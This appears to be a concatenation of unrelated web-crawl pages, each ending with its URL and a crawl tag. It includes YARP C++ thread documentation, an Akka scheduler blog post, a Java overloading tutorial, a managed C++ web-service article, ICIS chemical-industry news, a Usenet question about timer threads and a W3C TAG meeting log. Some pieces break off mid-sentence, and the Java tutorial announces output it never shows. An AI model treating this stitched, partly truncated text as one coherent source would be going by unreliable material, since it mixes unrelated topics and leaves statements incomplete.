refinedweb
An abstraction for a thread of execution. More...

#include <yarp/os/Thread.h>

An abstraction for a thread of execution.

Definition at line 23 of file Thread.h.

Constructor. Thread begins in a dormant state. Call Thread::start to get things going. Definition at line 53 of file Thread.cpp.

Destructor. Definition at line 61 of file Thread.cpp.

Called just after a new thread starts (or fails to start); this is executed by the same thread that calls start(). Definition at line 102 of file Thread.cpp.

Called just before a new thread starts. This method is executed by the same thread that calls start(). Definition at line 99 of file Thread.cpp.

Check how many threads are running. Definition at line 110 of file Thread.cpp.

Get a unique identifier for the thread. Definition at line 115 of file Thread.cpp.

Get a unique identifier for the calling thread. Definition at line 119 of file Thread.cpp.

Query the current scheduling policy of the thread, if the OS supports that. Definition at line 133 of file Thread.cpp.

Query the current priority of the thread, if the OS supports that. Definition at line 129 of file Thread.cpp.

Returns true if the thread is running (Thread::start has been called successfully and the thread has not stopped). Definition at line 95 of file Thread.cpp.

Returns true if the thread is stopping (Thread::stop has been called). Definition at line 90 of file Thread.cpp.

Join the thread. The function returns when the thread execution has completed: it stops the execution of the thread that calls it until either the thread to join has finished execution (when it returns from run()) or the given number of seconds has elapsed. Definition at line 70 of file Thread.cpp.

Call-back, called while halting the thread (before join). This callback is executed by the same thread that calls stop(). It should not be called directly. Override this method to do the right thing for your particular Thread::run. Reimplemented in yarp::os::Terminee, and ZombieHunterThread. Definition at line 80 of file Thread.cpp.

Main body of the new thread; override this method to do the thread's work. Implemented in yarp::dev::FakeMotionControl, yarp::dev::MEIMotionControl, yarp::dev::FakeBot, yarp::dev::JrkerrMotionControl, RunReadWrite, yarp::dev::KinectDeviceDriver::USBThread, yarp::dev::ServerKinect, yarp::dev::ServerInertial, RFModuleThreadedHandler, yarp::dev::ServerSerial, yarp::dev::ServerSoundGrabber, SoundResources, RunTerminator, yarp::dev::UrbtcControl, yarp::os::RosNameSpace, yarp::dev::VirtualAnalogWrapper, yarp::dev::StageControl, ModuleHelper, yarp::os::Terminee, ZombieHunterThread, streamThread, yarp::os::MpiControlThread, and MessageStackThread.

Set the default stack size for all threads created after this point. A value of 0 will use a reasonable default. Definition at line 137 of file Thread.cpp.

Set the stack size for the new thread. Must be called before Thread::start. Definition at line 106 of file Thread.cpp.

Set the priority and scheduling policy of the thread, if the OS supports that. Definition at line 124 of file Thread.cpp.

Start the new thread running. Definition at line 85 of file Thread.cpp.

Stop the thread. Thread::isStopping will start returning true. The user-defined Thread::onStop method will be called. Then, this simply sits back and waits for thread termination, so it cannot be called from within run(). Definition at line 74 of file Thread.cpp.

Initialization method. The thread executes this function when it starts, before "run". Reimplemented in streamThread, and yarp::os::MpiControlThread. Definition at line 107 of file Thread.h.

Release method. The thread executes this function once when it exits, after the last "run".
This is a good place to release resources that were initialized in threadInit() (release memory, and device driver resources). Reimplemented in streamThread, and yarp::os::MpiControlThread. Definition at line 116 of file Thread.h. Reschedule the execution of current thread, allowing other threads to run. Definition at line 141 of file Thread.cpp.
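A minimal usage sketch of the class documented above (the Worker name, the 0.5 s work period, and the 2 s lifetime are illustrative; yarp::os::Time::delay is used for the sleeps):

#include <yarp/os/Thread.h>
#include <yarp/os/Time.h>
#include <cstdio>

class Worker : public yarp::os::Thread {
public:
    virtual bool threadInit() {
        printf("worker starting\n");
        return true;            // returning false would abort start()
    }
    virtual void run() {
        while (!isStopping()) { // stop() flips isStopping() to true
            // ... periodic work would go here ...
            yarp::os::Time::delay(0.5);
        }
    }
    virtual void threadRelease() {
        printf("worker done\n"); // release what threadInit() acquired
    }
};

int main() {
    Worker w;
    w.start();                  // spawn the thread; run() begins
    yarp::os::Time::delay(2.0); // let it work for a while
    w.stop();                   // request stop, then join
    return 0;
}

Splitting setup into threadInit() rather than the constructor means a failed initialization simply makes start() fail, with no half-constructed thread left running.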
http://yarp.it/classyarp_1_1os_1_1Thread.html
CC-MAIN-2017-43
en
refinedweb
In this blog, we will be scheduling jobs based on time using the Akka scheduler. The jobs will be scheduled based on IST (Indian Standard Time). It is basically an alternative, to some extent, to Quartz Scheduler, which is also used to schedule time-based jobs. We can schedule jobs at any point of time, i.e. based on IST or any other time zone, like UTC.

Let's say you want your job to be scheduled at 9:00:00 AM IST every day. What would you do? Scheduling such a job using the normal Akka scheduler is not easy. So what I have done is write an extra function so that the normal Akka scheduler acts like a Quartz scheduler, but only time based, not calendar based. With the example I am going to share, you will be able to schedule time-based jobs for almost any time zone; you just need to mention the time zone. In this example I am focusing on IST (Indian Standard Time), but you can tweak it.

Example: send an e-mail at 09:00:00 AM every day. Akka Quartz is one way, but if you can get this done with the normal Akka scheduler, why mess around with Akka Quartz? Alright, let's head over to the code and see how we can accomplish it.

Here is the ScheduleActor class:

import akka.actor.Actor

class ScheduleActor extends Actor {
  import ScheduleActor._

  // a var keeps this example simple; prefer immutability wherever possible
  var count = 1

  def receive: PartialFunction[Any, Unit] = {
    case IncrementNumber =>
      count += 1
      println(count)
  }
}

/**
 * Created by deepak on 22/1/17.
 */
object ScheduleActor {
  case object IncrementNumber
}

Here is the implementation for the job:

import java.text.SimpleDateFormat
import java.util.{Date, TimeZone}

import scala.concurrent.duration._

import ScheduleActor.IncrementNumber
import akka.actor.{ActorSystem, Props}

/**
 * Created by deepak on 22/1/17.
 */
object ScheduleJob extends App {
  val system = ActorSystem("SchedulerSystem")
  val schedulerActor = system.actorOf(Props(classOf[ScheduleActor]), "Actor")
  implicit val ec = system.dispatcher

  // the first argument of schedule is the initial delay,
  // the second argument is the interval between runs
  system.scheduler
    .schedule(calculateInitialDelay().milliseconds, 60.seconds)(
      schedulerActor ! IncrementNumber)

  def calculateInitialDelay(): Long = {
    val now = new Date()
    val sdf = new SimpleDateFormat("HH:mm:ss")
    sdf.setTimeZone(TimeZone.getTimeZone("IST"))
    val time1 = sdf.format(now)
    val time2 = "00:00:00" // the target IST time; for 9 PM IST use "21:00:00"
    val format = new SimpleDateFormat("HH:mm:ss")
    val date1 = format.parse(time1)
    val date2 = format.parse(time2)
    val timeDifference = date2.getTime() - date1.getTime()
    // if the target time has already passed today, schedule for tomorrow
    val calculatedTime =
      if (timeDifference < 0) Constant.DAYHOURS + timeDifference
      else timeDifference
    calculatedTime
  }
  // calculateInitialDelay makes the first run fire at the IST time given above
}

That's all; you are all set to schedule time-based jobs without using Quartz Scheduler. The full code is available on GitHub. If you find any challenge, do let me know in the comments. If you enjoyed this post, I'd be very grateful if you'd help it spread. Keep smiling, keep coding! Cheers!
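PS: calculateInitialDelay above refers to a Constant object that the post never shows. The DAYHOURS name comes from the usage; its value is an assumption implied by the wrap-around arithmetic (one day in milliseconds), so a minimal sketch would be:

object Constant {
  // one day in milliseconds, so a negative difference rolls over to
  // the same wall-clock time tomorrow
  val DAYHOURS: Long = 24L * 60 * 60 * 1000
}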
https://blog.knoldus.com/2017/02/10/an-alternative-to-akka-quartz-time-timezoneist-and-others-based-jobs-using-akka-scheduler/
CC-MAIN-2017-43
en
refinedweb
This Method Overloading Example section explains how method overloading is accomplished in Java.

Posted on: July 25, 2013

In this section we will read about overloading in Java. Method overloading means defining several methods with the same name in one class; it is possible because Java supports polymorphism. The concept of method overloading allows the Java programmer to reuse one method name, but the methods must be differentiated by their parameter lists: the number, types, and order of their parameters. (The return type alone is not enough to tell two overloaded methods apart.) Constructors in Java are a suitable example for understanding the concept of method overloading. Overloading allows the Java programmer to accomplish compile-time polymorphism: callers can use the various implementations behind one name and get the desired output, without needing to know about the internal processing of each.

Example

Here we give a simple example which will demonstrate method overloading in Java. We will create a Java class that uses the concept of method overloading. As discussed above, a constructor of a class also uses the concept of method overloading, so in this example we will create various constructors of a class. Then we will create methods with the same name but with different parameter lists (and, where appropriate, different return types).

MethodOverloading.java

public class MethodOverloading {
  int a;
  int b;
  double c;
  double d;

  public MethodOverloading() {
  }

  public MethodOverloading(int a, int b) {
    this.a = a;
    this.b = b;
  }

  public void add() {
    int sum = a + b;
    System.out.println("Sum Of " + a + " and " + b + " = " + sum);
  }

  public int add(int num1, int num2) {
    return num1 + num2;
  }

  public double add(double num1, double num2) {
    return num1 + num2;
  }
}

MainClass.java

public class MainClass {
  public static void main(String args[]) {
    int a = 6;
    int b = 4;
    double c = 4.5;
    double d = 5.5;
    MethodOverloading mo = new MethodOverloading();
    MethodOverloading mo1 = new MethodOverloading(2, 4);
    mo1.add();
    double sum1 = mo.add(c, d);
    System.out.println("Sum Of " + c + " and " + d + " = " + sum1);
    int sum2 = mo.add(a, b);
    System.out.println("Sum Of " + a + " and " + b + " = " + sum2);
  }
}

Output

When you execute MainClass.java you will get the following output.
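Tracing MainClass above (derived from the code rather than captured from a run): mo1.add() prints the field-based sum, then the double and int overloads are dispatched by argument type:

Sum Of 2 and 4 = 6
Sum Of 4.5 and 5.5 = 10.0
Sum Of 6 and 4 = 10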
https://www.roseindia.net/java/beginners/method-overloading-example-in-java.shtml
CC-MAIN-2017-43
en
refinedweb
We just published a new RTM release of the Azure WebJobs SDK, packed with new features! This release opens a new extensibility model for the SDK which allows you to write custom triggers and binders: for example, triggering functions based on file events, periodic schedules, and so on. It simplifies developing and managing WebJobs, since you can now have a single WebJob with functions which can be triggered on Azure Queues, Blobs, Service Bus, Files, Timers, WebHooks (GitHub, Slack, Instagram, IFTTT) and more. You can also set up alerts that send a notification when a function fails. We've also added many new features and made many bug fixes based on your feedback.

Features in this release

This release is built around the new extensibility model for the SDK, which allows you to write custom triggers and binders, as well as core improvements to the existing feature set. Following are some of the highlights.

Extensible model for writing your own triggers and binders

Extensions you write can be used by others in their applications. Redis.WebJob.Extensions is a project being built by Jason Haley which allows a user to trigger functions based on events in Redis. We created a new open source repo which contains extensions demonstrating the new extensibility model. Follow the detailed guide on the architecture of the extensibility model; there is a sample you can use to get started with writing your own trigger or binder.

New triggers, binders and attributes

This release includes many new ways for the SDK to trigger functions:

- Schedule-based, using TimerTrigger
- File-based events, using FileTrigger
- Ensure only a single instance of a particular function will run at any given time across multiple hosts, using the Singleton attribute
- Cancel a function after a specified amount of time, using the Timeout attribute
- Send emails on function completion, using the new SendGrid binding
- Trigger functions based on some error threshold (for example, raise an alert if there are more than 10 errors in the last hour), using ErrorTrigger
- Trigger functions based on generic WebHook events, using WebHookTrigger (preview)

The following snippet of code shows a WebJob with functions which can be triggered on all these events. As you can see, you can now have a single WebJob running with all these functions being triggered on different events. You can also leverage all the existing features of the SDK such as parameter binding, route matching and more.

public class Functions
{
    public static void ProcessTimer(
        [TimerTrigger("*/15 * * * * *", RunOnStartup = true)] TimerInfo info,
        [Queue("queue")] out string message)
    {
        message = info.FormatNextOccurrences(1);
    }

    public static void ProcessQueueMessage(
        [QueueTrigger("queue")] string message,
        TextWriter log)
    {
        log.WriteLine(message);
    }

    public static void ProcessFileAndUploadToBlob(
        [FileTrigger(@"import\{name}", "*.*", autoDelete: true)] Stream file,
        [Blob(@"processed/{name}", FileAccess.Write)] Stream output,
        string name,
        TextWriter log)
    {
        output = file;
        file.Close();
        log.WriteLine(string.Format("Processed input file '{0}'!", name));
    }

    [Singleton]
    public static void ProcessWebHookA([WebHookTrigger] string body, TextWriter log)
    {
        log.WriteLine(string.Format("WebHookA invoked! Body: {0}", body));
    }

    public static void ProcessGitHubWebHook([WebHookTrigger] string body, TextWriter log)
    {
        dynamic issueEvent = JObject.Parse(body);
        log.WriteLine(string.Format("GitHub WebHook invoked! ('{0}', '{1}')",
            issueEvent.issue.title, issueEvent.action));
    }

    public static void ErrorMonitor(
        [ErrorTrigger("00:01:00", 1)] TraceFilter filter,
        TextWriter log,
        [SendGrid(To = "[email protected]", Subject = "Error!")] SendGridMessage message)
    {
        // log last 5 detailed errors to the Dashboard
        log.WriteLine(filter.GetDetailedMessage(5));
        message.Text = filter.GetDetailedMessage(1);
    }
}

New features in the Core SDK

Apart from opening up the extensibility model and adding more triggers and binders, we also added many features to the Core SDK. Many of these were feature requests from the community, so we are thrilled to complete them in this release.

- More control over Queue processing: a user has more control (JobHostQueuesConfiguration.NewBatchThreshold) over the concurrency settings of how many queue messages are dequeued, and can also plug in their own QueueProcessor to customize how queue messages are processed.
- Extensible tracing and logging: this release provides extensibility points so you can plug in your own logger.
- Error monitoring system: monitor the host or functions for any errors; you can also raise alerts and send notifications via email or text, or plug in any other system such as IFTTT.
- Multiple storage account support: use multiple storage accounts in your WebJob functions, for scenarios such as reading a blob from one storage account and archiving it to another storage account.
- Function timeouts: based on user feedback ("Continuous Web Job frozen and preventing further QueueTriggers"), we added a Timeout attribute which allows functions to declaratively request cancellation when a timeout expires. You can also set this at the JobHost level.
- Dynamically enable/disable functions: disable functions from being triggered, controlled by a config switch which could be an app setting or environment name.
- Added a CloudBlobDirectory binding for blobs.
- IEnumerable binder for blobs: you can now bind to a collection of blobs (IEnumerable, CloudBlobContainer, etc.).
- Control/customize the Azure Storage SDK clients used by the WebJobs SDK: added JobHostConfiguration.StorageClientFactory to set advanced options on CloudQueueClient/CloudBlobClient/CloudTableClient, etc.

ServiceBus enhancements

Enhancements include:

- Allow deep customization of message processing via ServiceBusConfiguration.MessagingProvider
- MessagingProvider supports customization of the ServiceBus MessagingFactory and NamespaceManager
- A new MessageProcessor strategy pattern allows you to specify a processor per queue/topic
- Support message processing concurrency by default (previously there was no concurrency)
- Easy customization of OnMessageOptions via ServiceBusConfiguration.MessageOptions
- Allow AccessRights to be specified on ServiceBusTriggerAttribute/ServiceBusAttribute (for scenarios where you might not have Manage rights)

Dashboard for monitoring

You can continue to use the dashboard to monitor all functions triggered on these various events. You get all the same benefits of the dashboard as before, such as real-time monitoring, real-time I/O, replaying a function, aborting a function, and so on. The following image shows the Functions view of the dashboard for this specific WebJob.
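For context, functions like these run inside a console host. A minimal entry point might look like the following (a sketch: it assumes the extensions packages listed in the next section are installed, and that the storage connection strings are configured in app settings):

using Microsoft.Azure.WebJobs;

class Program
{
    static void Main()
    {
        var config = new JobHostConfiguration();
        config.UseTimers();  // enable TimerTrigger
        config.UseFiles();   // enable FileTrigger

        var host = new JobHost(config);
        host.RunAndBlock();  // run until the process is stopped
    }
}

Each extension contributes a Use* configuration call, which is how the new extensibility model keeps the core host unaware of individual trigger types.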
Download this release

You can download the WebJobs SDK from the NuGet gallery and install the packages using the NuGet Package Manager Console, like this:

- Install-Package Microsoft.Azure.WebJobs

If you want to use Microsoft Azure Service Bus, install the following package:

- Install-Package Microsoft.Azure.WebJobs.ServiceBus

There is a new package which has some of the new triggers (Timer, File, etc.) and binders built on the new extensibility model:

- Install-Package Microsoft.Azure.WebJobs.Extensions

There is a new package with which you can send emails using the SendGrid service; you can use this to raise email notifications for different errors such as function failures:

- Install-Package Microsoft.Azure.WebJobs.Extensions.SendGrid

This is a new package which allows the SDK to trigger functions based on WebHook events. This package is currently still in preview:

- Install-Package Microsoft.Azure.WebJobs.Extensions.WebHooks

Open source

The source code for the SDK, the extensibility system and related repos is available on GitHub. Please open issues for any feedback and send PRs for issues you want to fix.

Samples

- You can find samples on how to use triggers and binders for blobs, tables, queues, timers, files, WebHooks, Service Bus and more.
- Guidelines for authoring new triggers and binders
- Azure WebJobs Update with Pranav Rastogi
- Channel 9 video on Making Your Jobs Easier With Windows Azure WebJobs SDK
- Introduction to WebJobs and SDK by Scott Hanselman
- Azure WebJobs - Recommended Resources
- WebJobs video series on Azure Friday
- Video series by Magnus Martensson
- Tutorial: Getting started with Microsoft Azure WebJobs SDK

Give feedback and get help

If you have questions, please ask them on the Azure forum, the ASP.NET forum, or StackOverflow.com (tag name #Azure-WebJobsSDK).

Summary

This release of the SDK opens up a whole new world of triggers and binders, enabling extension authors to write triggers for any event type they choose. Examples include file events, timer/cron schedule events, SQL events, Redis pub/sub events, etc. (check out the documentation and samples linked above). We look forward to receiving your feedback around the extensibility model.

Thank you!

Azure WebJobs team

Find us on Twitter for the latest updates and use #AzureWebJobs.
https://azure.microsoft.com/de-de/blog/azure-webjobs-sdk-1-1-0-rtm/
CC-MAIN-2017-43
en
refinedweb
This article assumes you are familiar with declaring and using managed types and the .NET Garbage Collector.

Creating your first web service is incredibly easy if you use C# or VB.NET (see my previous article for details). Writing a WebService using managed C++ in .NET is also extremely simple, but there are a couple of 'gotcha's that can cause a few frustrating moments. My first suggestion is to use the Visual Studio .NET wizards to create your WebService (in fact it's a great idea for all your apps when you are first starting out). This is especially important if you are moving up through the various builds of the beta bits of .NET: what is perfectly acceptable in one build may fail to compile in another build, and it may be difficult to work out which piece of the puzzle you are missing.

Using the wizards can get you a managed C++ WebService up and running in minutes, but things can start to get a little weird as soon as you try something a little more risqué. For this example I have created a service called MyCPPService by using the wizard. Simply select File | New Project and run through the wizard to create a C++ WebService.

A new namespace will be defined called CPPWebService, and within this namespace will be the classes and structures that implement your webservice. For this example I have called the class MyService. Other files that are created by the wizard include the .asmx file that acts as a proxy for your service, the config.web file for configuration settings, and the .disco file for service discovery. Once you compile the class your assembly will be stored as CPPWebService.dll in the /bin directory.

I wanted to mimic the C# WebService created in my previous article, but with a few minor changes to illustrate using value and reference types. With this in mind I defined a value type structure ClientData and a managed reference type ClientInfo within the namespace, both containing a name and an ID (string and int values respectively).

__value public struct ClientData
{
    String *Name;
    int ID;
};

__gc public class ClientInfo
{
    String *Name;
    int ID;
};

In order to return an array of objects, a quick typedef is also declared:

typedef ClientData ClientArray[];

In a similar fashion I defined my MyService class as a simple managed C++ class with three methods: MyMethod, a simple method that returns an integer; GetClientData, which returns a single ClientData value; and GetClientsData, which returns an array of ClientData values.

// CPPWebService.h
#pragma once

#using "System.EnterpriseServices.dll"

namespace CPPWebService
{
    __value public struct ClientData
    {
        String *Name;
        int ID;
    };

    __gc public class ClientInfo
    {
        String *Name;
        int ID;
    };

    typedef ClientData ClientArray[];

    __gc class MyService
    {
    public:
        [WebMethod] int MyMethod();
        [WebMethod] ClientData GetClientData();
        [WebMethod] ClientArray GetClientsData(int Number);
    };
}

The important thing to notice about the function prototypes is the [WebMethod] attribute - this informs the compiler that the method will be a method of a web service, and that it should provide the appropriate support and plumbing. The method you attach this attribute to must also be publicly accessible.

The implementation (.cpp) file is as follows.
#include "stdafx.h"

#using <mscorlib.dll>
#using "System.Web.dll"
#using "System.Web.Services.dll"

using namespace System;
using namespace System::Web;
using namespace System::Web::Services;

#include "CPPWebService.h"

namespace CPPWebService
{
    int MyService::MyMethod()
    {
        return 42;
    }

    ClientData MyService::GetClientData()
    {
        ClientData data;
        data.Name = new String("Client Name");
        data.ID = 1;
        return data;
    }

    ClientArray MyService::GetClientsData(int Number)
    {
        // simple sanity checks
        if (Number < 0 || Number > 10)
            return 0;

        ClientArray data = new ClientData __gc[Number];
        if (Number > 0 && Number <= 10)
        {
            for (int i = 0; i < Number; i++)
            {
                // String::Concat returns a new string (it does not modify
                // its target), so the result must be assigned back
                data[i].Name = String::Concat(new String("Client "), i.ToString());
                data[i].ID = i;
            }
        }
        return data;
    }
}

Note the use of the syntax i.ToString(). In .NET, value types such as ints and enums can have methods associated with them; i.ToString() simply calls Int32::ToString() on the variable i.

One huge improvement of .NET beta 2 over beta 1 is that you no longer need to mess around with the XmlIncludeAttribute class to inform the serializer about your structure. A few bugs that either caused things to misbehave, or worse, not run altogether, have also been fixed. Writing a WebService in managed C++ is now just as easy as it is in C#, with the advantage that you can mix and match native and managed code while retaining the raw power of C++.

Once you have the changes in place you can build the project, then test the service by right clicking on CPPWebService.asmx in the Solution Explorer in Visual Studio and choosing "View in Browser". The test page is shown below.

Clicking on one of the methods (say, GetClientsData) results in a proxy page being presented which allows you to invoke the method directly from your browser. The GetClientsData method takes a single int parameter which you can enter in the edit box. When invoked, this returns the results serialized as XML.

Writing WebServices using Visual C++ with managed extensions is just as easy as writing them using C# or VB.NET, as long as you remember a few simple things: use attributes, declare your classes as managed, and make them publicly accessible. Using the Visual Studio .NET wizards makes writing and deploying these services a point and click affair, but even if you wish to do it by hand the steps involved are extremely simple.

Oct 18 - updated for .NET beta 2

This article, along with any associated source code and files, is licensed under The Code Project Open License (CPOL)
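A quick way to exercise the finished service without writing any client code: ASMX endpoints can accept plain HTTP GET requests for methods with primitive parameters (depending on configuration, the HttpGet protocol must be enabled). A sketch, with the host name and virtual directory assumed:

http://localhost/CPPWebService/CPPWebService.asmx/GetClientsData?Number=3

The response is an XML document containing three serialized ClientData elements, matching what the browser test page shows.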
https://www.codeproject.com/Articles/1043/Your-first-managed-C-Web-Service?msg=1014467
CC-MAIN-2017-43
en
refinedweb
04 March 2010 16:08 [Source: ICIS news]

By Joe Kamalick

WASHINGTON (ICIS news)--A new, more moderate plan for a climate bill is soon to be set afloat in the US Senate, but the still tentative effort seemingly has already run aground on the hard rocks of coal.

Senators John Kerry (Democrat-Massachusetts), Lindsey Graham (Republican-South Carolina) and Joe Lieberman (Independent-Connecticut) are said to be close to issuing a working paper for a new climate bill, although not a formal piece of legislation.

While details are not yet available, the new climate bill's key feature is said to be a gradual industry-by-industry sequence to reducing greenhouse gases - a go-slow approach that will abandon any sort of economy-wide cap-and-trade mandate.

The three senators' effort is said to be designed to avoid the controversial central element of earlier climate change bills - a federal mandate to cap current greenhouse gas (GHG) emissions throughout the economy and gradually reduce them through an emissions permit trading system.

Their measure, say sources, would call for aggressive reductions in US emissions of greenhouse gases but would offer a measured and slower approach, perhaps beginning with electric utilities and then gradually moving on to encompass other sectors, such as manufacturing, mining, transportation and agriculture.

In each successive segment of the economy, entities that emit greenhouse gases would be given flexibility and time to reach targeted emissions cuts.

Electric utilities likely would be the first-at-bat industry, and that critical sector would be allowed generous compliance terms to ease the transition to less carbon-intensive operations.

But barely had word of the three senators' "pre-bill" circulated on Capitol Hill when it came under perhaps fatal fire from 13 Democrat senators vehemently opposed to any special favours for utilities and their carbon-rich ways.

In a letter to Senate Majority Leader Harry Reid (Democrat-Nevada), pointedly copied to Kerry, Graham and Lieberman, the group of 13 warned that they oppose any climate bill that would exempt utilities from strict emissions cuts.

Led by New Jersey Democrat Robert Menendez, the 13 senators demanded that Reid "ensure that energy and climate legislation builds on the existing Clean Air Act and does not create loopholes for old, inefficient and polluting coal-fired power plants".

"The bill should require coal-fired power plants - old and new alike - to meet up-to-date performance standards for carbon dioxide that will complement an overall cap on emissions," the letter said.

"Coal-fired power plants are the nation's largest source of global warming pollution," the 13 senators said in a note accompanying the letter to Reid.

"The Clean Air Act requires that power plants - as well as factories, refineries and other big sources of pollution - meet source-specific performance standards," the note said, pointing to a landmark 2007 decision.

The 13 Democrat senators - who in addition to Menendez include Barbara Boxer of California, Chris Dodd of Connecticut, Frank Lautenberg of New Jersey and Jeff Merkley and Ron Wyden, both of Oregon - were sharply critical of the massive climate bill passed by the US House last year, because that narrowly approved measure granted major exemptions or compliance allowances for coal-fired utilities.
However, any climate legislation that would hold coal-fired utilities to an immediate and strict carbon emissions standard would lose the support of senators who otherwise might support a sharp cut in greenhouse gases.

To Frank Maisano, a long-time energy policy analyst and senior principal at the Washington, DC, law firm of Bracewell & Giuliani, the letter from Menendez and 12 other Senate Democrats is a perfect illustration of how difficult - and likely impossible - it will be for Congress to pass a climate bill in this election year.

"When you push a piece into a bill that will pick up a couple of more votes on one side, it pushes votes out on the other side," he said in reference to the Menendez letter. "Every time someone says something to make a climate bill more moderate, it raises objections from the other side. It is a political formula that never adds up."

Maisano also noted that if the emissions mandate is not economy-wide and focuses first on utilities, then their support is gone.

"There's not going to be climate legislation this year," Maisano said. "Of course that's not 100% certain," he added, "nothing ever is - but I don't see any widespread cap-and-trade legislation for this year. There's simply not the votes for it."

"It's just a house of cards," another Hill watcher said of climate legislation. "Every time someone tries to add a card or take one out, it all falls apart."
http://www.icis.com/Articles/2010/03/04/9339347/insight-new-us-senate-climate-bid-founders-on-coal.html
CC-MAIN-2015-06
en
refinedweb
13 January 2012 02:42 [Source: ICIS news]

SINGAPORE (ICIS)--"The shutdown will take place in April or within the second quarter," he said.

Both IAC and the adjoining International Vinyl Acetate Company (IVC) vinyl acetate monomer (VAM) plant, which has an annual nameplate capacity of 330,000 tonnes, are currently operating at full capacity, he said. The IVC VAM plant is not due for any turnarounds this year, he added.

IAC and IVC are joint ventures between Saudi International Petrochemical Company (Sipchem) and Helm. Half of the output from the acetic acid plant is utilised in the production of VAM. The remaining acetic acid is sold on local and international markets.

Major acetic acid producers in Asia include US-based

Please visit the complete ICIS plants and projects database for more information.
http://www.icis.com/Articles/2012/01/13/9523424/iac-saudi-acetic-acid-plant-to-shut-for-maintenance.html
CC-MAIN-2015-06
en
refinedweb
I have a string, and I want to find which one of the following 3 characters comes first (i.e., is on the left-most side of a given string): (, ) or ".

For example:

qwert(ui)"  should return  (
qwerty"(ff) should return  "
qwer)()("   should return  )

and so on.

THX
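One idiomatic way to do this in Perl (a sketch; $str and the print are illustrative) is a single character-class match, since the regex engine always reports the left-most occurrence first:

my $str = 'qwerty"(ff';
if ( my ($first) = $str =~ /([()"])/ ) {
    print "$first\n";   # prints " for this input
}

The character class tries all three characters at each position in turn, so the captured character is necessarily whichever of the three appears first in the string.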
http://www.perlmonks.org/index.pl?displaytype=xml;node_id=37089
CC-MAIN-2015-06
en
refinedweb
help with "rolling my own" Timer class

- From: Alfonso Morra <sweet-science@xxxxxxxxxxxx>
- Date: Mon, 18 Jul 2005 23:20:18 +0000 (UTC)

Hi,

I am writing a timer class that I want to be able to notify me (via a callback function) when a specified interval has elapsed. I have most of the timer functionality figured out; however, I need to spawn a new thread to carry out the "time watch", and I need to do this in a cross-platform (well, Linux/Windows) way ...

Any help will be much appreciated. The code (snippet) follows below:

#include <ctime>

typedef void (*TIMER_CB_FUNC)( void );

class Timer {
public:
    inline Timer() : m_cbfunc(0), m_interval(0), m_stime(0) {}
    Timer( TIMER_CB_FUNC, unsigned short );
    Timer( const Timer& );
    Timer& operator= ( const Timer& );
    virtual ~Timer();   // not really required

private:
    TIMER_CB_FUNC m_cbfunc;
    unsigned short m_interval;
    time_t m_stime;

    /* private functions */
    void reset( void );
};

Basically, when the Timer class is constructed, it must start a new thread that waits till the time is up and then notifies me.

MTIA
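One portable shape for the requested "time watch" thread, sketched with std::thread from C++11 (which postdates this 2005 post; the same structure works with pthread_create on Linux and _beginthreadex on Windows behind an #ifdef):

#include <atomic>
#include <chrono>
#include <thread>

typedef void (*TIMER_CB_FUNC)( void );

class Timer {
public:
    Timer( TIMER_CB_FUNC cb, unsigned short interval )
        : m_cbfunc(cb), m_interval(interval), m_cancelled(false)
    {
        // spawn the watcher thread immediately, per the constructor contract
        m_thread = std::thread([this] {
            auto deadline = std::chrono::steady_clock::now()
                          + std::chrono::seconds(m_interval);
            // sleep in short steps so cancellation is honoured promptly
            while (!m_cancelled &&
                   std::chrono::steady_clock::now() < deadline) {
                std::this_thread::sleep_for(std::chrono::milliseconds(50));
            }
            if (!m_cancelled && m_cbfunc)
                m_cbfunc();   // interval elapsed: fire the callback
        });
    }

    ~Timer() {
        m_cancelled = true;   // stop the watcher if it is still waiting
        if (m_thread.joinable())
            m_thread.join();
    }

private:
    TIMER_CB_FUNC m_cbfunc;
    unsigned short m_interval;   // seconds
    std::atomic<bool> m_cancelled;
    std::thread m_thread;
};

Because the destructor joins, a Timer going out of scope never leaves a dangling thread behind; on a 2005 toolchain the lambda body would instead live in a static thread-entry function that receives this as its void* argument.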
http://www.tech-archive.net/Archive/DotNet/microsoft.public.dotnet.languages.vc/2005-07/msg00425.html
CC-MAIN-2015-06
en
refinedweb
IRC log of tagmem on 2011-02-10 Timestamps are in UTC. 13:45:48 [RRSAgent] RRSAgent has joined #tagmem 13:45:48 [RRSAgent] logging to 13:45:57 [ht] Meeting: TAG Face-to-Face 13:46:03 [ht] Chair: Noah Mendelsohn 13:46:23 [ht] Agenda: 13:46:28 [ht] Scribe: Henry S. Thompson 13:46:33 [ht] Scribenick: ht 13:46:34 [plinss] plinss has joined #tagmem 13:57:44 [noah] noah has joined #tagmem 14:01:09 [masinter] masinter has joined #tagmem 14:05:27 [TimblPhone] TimblPhone has joined #tagmem 14:05:50 [TimblPhone] Sorry late 14:08:09 [DKA] DKA has joined #tagmem 14:10:39 [ht] Topic: Review of Agenda 14:10:50 [ht] NM: 14:13:24 [ht] NM: Action item review is just checking that we've got the right things on the schedule in the near term 14:14:02 [ht] NM: Open issue review is quite different, intended to check that we haven't let things fall between the cracks, or that we are carrying things we don't need to 14:14:22 [ht] Topic: TAG Priorities for 2011 14:14:37 [ht] NM: 14:15:02 [ht] NM: Good for us to review each year where our effort is going, and how we are going to get it done 14:15:14 [ht] ... and be sure we have a shared notion of our priorities 14:15:29 [DKA] q+ to suggest we take a look at w3c priorities : 14:15:45 [ht] NM: I'd like to get more than one person on the hook for at least some tasks, to share the work back and forth in some way 14:16:40 [TimblPhone] TimblPhone has joined #tagmem 14:16:43 [ht] NM: Looking back, we set outselves some priorities: Tracking/influencing the HTML work -- hard situation, but we did a number of things here and I think we did what we set to do 14:16:48 [timbl] timbl has joined #tagmem 14:17:52 [ht] NM: We also committed to a Web App Arch effort, since two years, but I don't feel that we've made as much progress here as I'd hoped -- we need to look hard at this to see whether we should modify or even drop our goal 14:18:22 [Ashok] Ashok has joined #tagmem 14:18:25 [ht] NM: Third goal was Metadata, an umbrella for many SemWeb issues 14:18:49 [ht] JR, LM: No, Metadata is much narrower than that, it is about documents only 14:19:03 [ht] TBL: +1 to keeping Metadata narrowly focussed 14:19:50 [ht] NM: We've also done good work, largely due to LM's efforts, on a number of core web infrastructure issues, including IRIs and media types 14:20:00 [ht] LM: I'm actually concerned IRIs are stalled 14:20:15 [noah] 14:20:46 [noah] 14:21:04 [ht] NM: On the organizational front, we're trying to structure the management of our work via Tracker Products 14:21:15 [masinter] s/IRIs are stalled/how little progress on IRIs lately/ 14:21:15 [ht] For example, 14:22:24 [ht] NM: Tracker has Issues, Actions and Products 14:22:44 [ht] ... Actions can be associated with Issues or Products 14:23:50 [ht] NM: See the Guide to TAG procedures 